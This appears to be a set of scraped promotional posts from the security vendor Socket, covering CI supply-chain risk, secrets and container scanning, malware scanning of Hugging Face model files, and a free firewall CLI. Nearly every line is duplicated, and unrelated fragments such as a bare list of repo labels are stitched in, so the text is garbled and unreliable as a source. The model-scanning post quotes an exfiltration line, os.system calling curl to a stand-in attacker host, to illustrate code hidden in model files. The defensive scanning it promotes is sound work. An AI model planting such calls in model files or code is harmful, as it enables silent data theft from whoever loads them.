Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.
Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
Starting today, that ends.
We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.
Just run:
npm i -g sfw
sfw npm install lodash
Works for: npm, yarn, pnpm, pip, uv, and cargo.
Starting today, that ends.
We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.
Just run:
npm i -g sfw
sfw npm install lodash
Works for: npm, yarn, pnpm, pip, uv, and cargo.
So whether you’re a clicker or a scripter 🧑💻 — you’re covered.
This is a public beta 🚧 Available NOW ⏰
Tell us what you love — and what’s broken 🛠️
So whether you’re a clicker or a scripter 🧑💻 — you’re covered.
This is a public beta 🚧 Available NOW ⏰
Tell us what you love — and what’s broken 🛠️
• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥
Whatever fits your mental model 🧠.
Finally, a sane way to bring order to repo chaos.
• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥
Whatever fits your mental model 🧠.
Finally, a sane way to bring order to repo chaos.